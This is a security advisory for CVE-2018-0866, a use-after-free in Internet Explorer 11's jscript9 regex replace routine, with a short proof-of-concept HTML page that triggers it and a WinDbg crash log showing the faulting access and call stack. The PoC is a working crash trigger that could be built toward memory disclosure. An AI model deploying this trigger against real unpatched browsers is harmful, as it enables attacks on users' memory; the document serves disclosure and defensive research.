Microsoft IE11 Js::RegexHelper::RegexReplace Use-After-Free

`IE11: Use-after-free in Js::RegexHelper::RegexReplace   
  
CVE-2018-0866  
  
  
There is a Use-after-free vulnerability in Internet Explorer that could potentially be used for memory disclosure.  
  
This was tested on IE11 running on Window 7 64-bit with the latest patches applied. Note that the PoC was tested in a 64-bit tab process via TabProcGrowth=0 registry flag and the page heap was enabled for iexplore.exe (The PoC is somewhat unreliable so applying these settings might help with reproducing).  
  
PoC:  
  
=========================================  
  
<!-- saved from url=(0014)about:internet -->  
<script>  
var vars = new Array(2);  
function main() {  
vars[0] = Array(1000000).join(String.fromCharCode(0x41));  
vars[1] = String.prototype.substring.call(vars[0], 1, vars[0].length);  
String.prototype.replace.call(vars[1], RegExp(), f);  
}  
function f(arg1, arg2, arg3) {  
alert(arg3);  
vars[0] = 1;  
CollectGarbage();  
return 'a';  
}  
main();  
</script>  
  
=========================================  
  
Debug log:  
  
=========================================  
  
(be0.c40): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
jscript9!Js::RegexHelper::RegexReplaceT<0>+0x122e5d:  
000007fe`ecc3b26d 440fb73c41 movzx r15d,word ptr [rcx+rax*2] ds:00000000`18090022=????  
  
0:013> r  
rax=0000000000000000 rbx=0000000000000000 rcx=0000000018090022  
rdx=0000000000000001 rsi=0000000000000000 rdi=0000000000000000  
rip=000007feecc3b26d rsp=0000000011e4a590 rbp=0000000011e4a610  
r8=fffc000000000000 r9=00000000000f423e r10=fffc000000000000  
r11=0000000000000008 r12=0000000000000000 r13=00000000148c5340  
r14=000007feec9b1240 r15=0000000000000000  
iopl=0 nv up ei ng nz ac pe cy  
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010293  
jscript9!Js::RegexHelper::RegexReplaceT<0>+0x122e5d:  
000007fe`ecc3b26d 440fb73c41 movzx r15d,word ptr [rcx+rax*2] ds:00000000`18090022=????  
  
0:013> k  
# Child-SP RetAddr Call Site  
00 00000000`11e4a590 000007fe`eca1282d jscript9!Js::RegexHelper::RegexReplaceT<0>+0x122e5d  
01 00000000`11e4a9d0 000007fe`ec9b9ee3 jscript9!Js::JavascriptString::EntryReplace+0x1e6  
02 00000000`11e4aa70 000007fe`ec9b9b5d jscript9!amd64_CallFunction+0x93  
03 00000000`11e4aad0 000007fe`eca325e9 jscript9!Js::JavascriptFunction::CallFunction<1>+0x6d  
04 00000000`11e4ab10 000007fe`ec9b9ee3 jscript9!Js::JavascriptFunction::EntryCall+0xd9  
05 00000000`11e4ab70 000007fe`ecbe6e56 jscript9!amd64_CallFunction+0x93  
06 00000000`11e4abe0 000007fe`ec9bd8e0 jscript9!Js::InterpreterStackFrame::Process+0x1071  
07 00000000`11e4af20 00000000`14cc0fbb jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x386  
08 00000000`11e4b1a0 000007fe`ec9b9ee3 0x14cc0fbb  
09 00000000`11e4b1d0 000007fe`ecbe6e56 jscript9!amd64_CallFunction+0x93  
0a 00000000`11e4b220 000007fe`ec9bd8e0 jscript9!Js::InterpreterStackFrame::Process+0x1071  
0b 00000000`11e4b560 00000000`14cc0fc3 jscript9!Js::InterpreterStackFrame::InterpreterThunk<1>+0x386  
0c 00000000`11e4b790 000007fe`ec9b9ee3 0x14cc0fc3  
0d 00000000`11e4b7c0 000007fe`ec9b9b5d jscript9!amd64_CallFunction+0x93  
0e 00000000`11e4b810 000007fe`ec9b9d2e jscript9!Js::JavascriptFunction::CallFunction<1>+0x6d  
0f 00000000`11e4b850 000007fe`ec9b9e2f jscript9!Js::JavascriptFunction::CallRootFunction+0x110  
10 00000000`11e4b930 000007fe`ec9b9d88 jscript9!ScriptSite::CallRootFunction+0x63  
11 00000000`11e4b990 000007fe`ecae3a22 jscript9!ScriptSite::Execute+0x122  
12 00000000`11e4ba20 000007fe`ecae2e75 jscript9!ScriptEngine::ExecutePendingScripts+0x208  
13 00000000`11e4bb10 000007fe`ecae4924 jscript9!ScriptEngine::ParseScriptTextCore+0x4a5  
14 00000000`11e4bc70 000007fe`e912fb61 jscript9!ScriptEngine::ParseScriptText+0xc4  
15 00000000`11e4bd20 000007fe`e912f9cb MSHTML!CActiveScriptHolder::ParseScriptText+0xc1  
16 00000000`11e4bda0 000007fe`e912f665 MSHTML!CJScript9Holder::ParseScriptText+0xf7  
17 00000000`11e4be50 000007fe`e9130a3b MSHTML!CScriptCollection::ParseScriptText+0x28c  
18 00000000`11e4bf30 000007fe`e91305be MSHTML!CScriptData::CommitCode+0x3d9  
19 00000000`11e4c100 000007fe`e9130341 MSHTML!CScriptData::Execute+0x283  
1a 00000000`11e4c1c0 000007fe`e98bfeac MSHTML!CHtmScriptParseCtx::Execute+0x101  
1b 00000000`11e4c200 000007fe`e988f02b MSHTML!CHtmParseBase::Execute+0x235  
1c 00000000`11e4c2a0 000007fe`e9111a79 MSHTML!CHtmPost::Broadcast+0x115  
1d 00000000`11e4c2e0 000007fe`e90a215f MSHTML!CHtmPost::Exec+0x4bb  
1e 00000000`11e4c4f0 000007fe`e90a20b0 MSHTML!CHtmPost::Run+0x3f  
1f 00000000`11e4c520 000007fe`e90a35ac MSHTML!PostManExecute+0x70  
20 00000000`11e4c5a0 000007fe`e90a73a3 MSHTML!PostManResume+0xa1  
21 00000000`11e4c5e0 000007fe`e909482f MSHTML!CHtmPost::OnDwnChanCallback+0x43  
22 00000000`11e4c630 000007fe`e991f74e MSHTML!CDwnChan::OnMethodCall+0x41  
23 00000000`11e4c660 000007fe`e90c7c25 MSHTML!GlobalWndOnMethodCall+0x240  
24 00000000`11e4c700 00000000`77449bbd MSHTML!GlobalWndProc+0x150  
25 00000000`11e4c780 00000000`774498c2 USER32!UserCallWinProcCheckWow+0x1ad  
26 00000000`11e4c840 000007fe`f1d91aab USER32!DispatchMessageWorker+0x3b5  
27 00000000`11e4c8c0 000007fe`f1ce59bb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555  
28 00000000`11e4fb40 000007fe`fda7572f IEFRAME!LCIETab_ThreadProc+0x3a3  
29 00000000`11e4fc70 000007fe`fa87925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f  
2a 00000000`11e4fca0 00000000`773259cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f  
2b 00000000`11e4fcf0 00000000`7755a561 kernel32!BaseThreadInitThunk+0xd  
2c 00000000`11e4fd20 00000000`00000000 ntdll!RtlUserThreadStart+0x1d  
  
=========================================  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: ifratric  
  
`